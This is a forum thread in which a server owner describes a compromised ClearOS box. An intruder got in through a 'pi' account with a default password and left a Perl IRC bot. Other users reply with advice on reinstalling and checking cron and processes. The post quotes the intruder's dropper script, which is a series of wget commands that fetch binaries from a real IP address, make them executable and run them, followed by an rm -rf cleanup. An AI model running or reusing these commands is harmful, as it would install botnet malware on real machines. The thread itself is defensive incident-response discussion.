Helllo everyone.
tl;dr Got malware on my server, sleeping at the moment I think, can I get rid of it or is new install only option?
I have a ClearOS Community release 6.6.0 Beta (Beta 2) host running at my parents place that has most likely been infected with some kind of malware.
I've been neglecting this machine a bit when it comes to security.
Brace yourself, long post..
6 months ago their internet was quite slow and sluggish, I noticed heavy traffic on port 22 which I accidentally left open in the firewall after I installed the server.
I blocked port 22 and things got better, now months later I found out why
Many of these messages below
# cat /var/mail/root
I can see that two users were created.
I have no memory of creating these two, but I can't say for sure. I did play around with a raspberry pi last year for a project.
In /home/pi there is a file called gb.sh that downloads files from a server and executes them, then deletes them.
So I think the name of the Malware is [Devising's Modded Perl Bot Commands List] or something like that.
There is a very big perl script named /home/pi/.conf
This script is huge, almost 2000 lines, a bunch of functions ready to do nasty stuff if called upon.
The attacker can send commands using IRC that are being executed on my server, e.g DDoS attacks, spam.
Using the command
#last
shows a lot of activity from the user pi from June 2015 to October 2015 (when I finally closed port 22 in the firewall.
So I don't think there has been any activity since then, can't find anything suspicious in the logs.
Now I would like to ask the more experienced people here for advice on what to look for, what log files that I should examine closely, well-known ports to monitor and so on.
And is it best to make a clean install of the server next time I go there, to be sure I get rid of all malicious code?
I appreciate any help I can get.
Thanks
tl;dr Got malware on my server, sleeping at the moment I think, can I get rid of it or is new install only option?
I have a ClearOS Community release 6.6.0 Beta (Beta 2) host running at my parents place that has most likely been infected with some kind of malware.
I've been neglecting this machine a bit when it comes to security.
Brace yourself, long post..
6 months ago their internet was quite slow and sluggish, I noticed heavy traffic on port 22 which I accidentally left open in the firewall after I installed the server.
I blocked port 22 and things got better, now months later I found out why
Many of these messages below
# cat /var/mail/root
From root@MYHOST.poweredbyclear.com Mon Sep 28 23:20:14 2015
Return-Path: <root@MYHOST.poweredbyclear.com>
X-Original-To: root
Delivered-To: root@MYHOST.poweredbyclear.com
Received: by MYHOST.poweredbyclear.com (Postfix, from userid 0)
id 3E2295C0829; Mon, 28 Sep 2015 23:20:12 +0200 (CEST)
To: root@MYHOST.poweredbyclear.com
From: pi@MYHOST.poweredbyclear.com
Auto-Submitted: auto-generated
Subject: *** SECURITY information for MYHOST.poweredbyclear.com ***
Message-Id: <20150928212013.3E2295C0829@MYHOST.poweredbyclear.com>
Date: Mon, 28 Sep 2015 23:20:12 +0200 (CEST)
MYHOST.poweredbyclear.com : Sep 28 23:20:11 : pi : user NOT in sudoers ; TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/bash
I can see that two users were created.
pi:x:1001:1001::/home/pi:/bin/bash
vid:x:2000:2000::/home/vid:/bin/bash
I have no memory of creating these two, but I can't say for sure. I did play around with a raspberry pi last year for a project.
In /home/pi there is a file called gb.sh that downloads files from a server and executes them, then deletes them.
wget -c http://5.49.85.44/arm4 -P /var/run && chmod +x /var/run/arm4 && /var/run/arm4
wget -c http://5.49.85.44/arm5 -P /var/run && chmod +x /var/run/arm5 && /var/run/arm5
wget -c http://5.49.85.44/arm6 -P /var/run && chmod +x /var/run/arm6 && /var/run/arm6
wget -c http://5.49.85.44/i586 -P /var/run && chmod +x /var/run/i586 && /var/run/i586
wget -c http://5.49.85.44/i686 -P /var/run && chmod +x /var/run/i686 && /var/run/i686
wget -c http://5.49.85.44/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://5.49.85.44/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://5.49.85.44/powerpc -P /var/run && chmod +x /var/run/arm40 && /var/run/powerpc
sleep 3;
rm -rf /var/run/ arm4 arm5 arm6 i586 i686 m68 mips mipsel powerp powerpc sh4 x86
So I think the name of the Malware is [Devising's Modded Perl Bot Commands List] or something like that.
There is a very big perl script named /home/pi/.conf
This script is huge, almost 2000 lines, a bunch of functions ready to do nasty stuff if called upon.
The attacker can send commands using IRC that are being executed on my server, e.g DDoS attacks, spam.
Using the command
#last
shows a lot of activity from the user pi from June 2015 to October 2015 (when I finally closed port 22 in the firewall.
So I don't think there has been any activity since then, can't find anything suspicious in the logs.
Now I would like to ask the more experienced people here for advice on what to look for, what log files that I should examine closely, well-known ports to monitor and so on.
And is it best to make a clean install of the server next time I go there, to be sure I get rid of all malicious code?
I appreciate any help I can get.
Thanks
Share this post:
Responses (6)
-
Accepted Answer
-
Accepted Answer
Nick Howitt wrote:
I don't know enough about it, but how did they get execute permissions to do things like create users if they did not have root access? This suggests to me than another account was compromised which was able to get elevated privileges through su/sudo.
Could the intruder be getting access through ftp to dump files on your system and be using the same account to relay mail?
I think this guy only got access to the user pi, which had the password 'password'.
This is a standard account for the Raspberry Pi which has become extremely popular the last years. I myself have a couple that I play around with and use for some projects.
I think that I created this account with the idea of storing some web app stuff from the Raspbberry Pi on the ClearOS server.
And everything he tried to do failed(I hope
) due to the fact that pi was not in the sudo group.
I have now improved my security a bit and will keep an eye on things, hopefully I wont get attacked again. -
Accepted Answer
-
Accepted Answer
I don't know enough about it, but how did they get execute permissions to do things like create users if they did not have root access? This suggests to me than another account was compromised which was able to get elevated privileges through su/sudo.
Could the intruder be getting access through ftp to dump files on your system and be using the same account to relay mail? -
Accepted Answer
Nick Howitt wrote:
I can't advise too much as I have very little experience of this, but I would have thought a complete re-installation would be advisable. As port 22 access was obtained, I assume it was with the root user and they could have done anything. There must be something launching that script at reboot. Cron or different start up methods such as ntsysv/chkconfig or editing one of the rc files could have been used or other ways I've no idea about.
At least if you completely reinstall then copy back in your data you won't have a rogue startup program which may reinfect you.
[edit]
At a minimum, delete the users and the scripts as quickly as you can. Also check for rogue processes ("ps aux" but I am not sure what to look and check for cron entries in /etc/cron.* and /var/spool/cron/*. I am not sure where to look for all the different auto-start options.
[/edit]
Hey! Thanks for your advice, I'm also thinking a new install would be a good thing to do, and its always nice to have the latest version of ClearOS
I believe the intruder never got access to my root account.
I have had this from the start I think:
cat /etc/ssh/sshd_config | grep PermitRootLogin
PermitRootLogin no
- I went thru the complete .bash_history for root, and I only found commands that I executed, dating back to the initial installation period. If the .bash_history was erased, then I would suspect something.
- Around 40-50 mails in /var/mail/root shows that the user pi tried to execute a lot of stuff using sudo, but denied.
I will keep looking thru some log files to get a better picture of what this intrudes has done or tried at least. - I went thru the complete .bash_history for root, and I only found commands that I executed, dating back to the initial installation period. If the .bash_history was erased, then I would suspect something.
-
Accepted Answer
I can't advise too much as I have very little experience of this, but I would have thought a complete re-installation would be advisable. As port 22 access was obtained, I assume it was with the root user and they could have done anything. There must be something launching that script at reboot. Cron or different start up methods such as ntsysv/chkconfig or editing one of the rc files could have been used or other ways I've no idea about.
At least if you completely reinstall then copy back in your data you won't have a rogue startup program which may reinfect you.
[edit]
At a minimum, delete the users and the scripts as quickly as you can. Also check for rogue processes ("ps aux" but I am not sure what to look and check for cron entries in /etc/cron.* and /var/spool/cron/*. I am not sure where to look for all the different auto-start options.
[/edit]
Please login to post a reply
You will need to be logged in to be able to post a reply. Login using the form on the right or register an account if you are new here.
Register Here »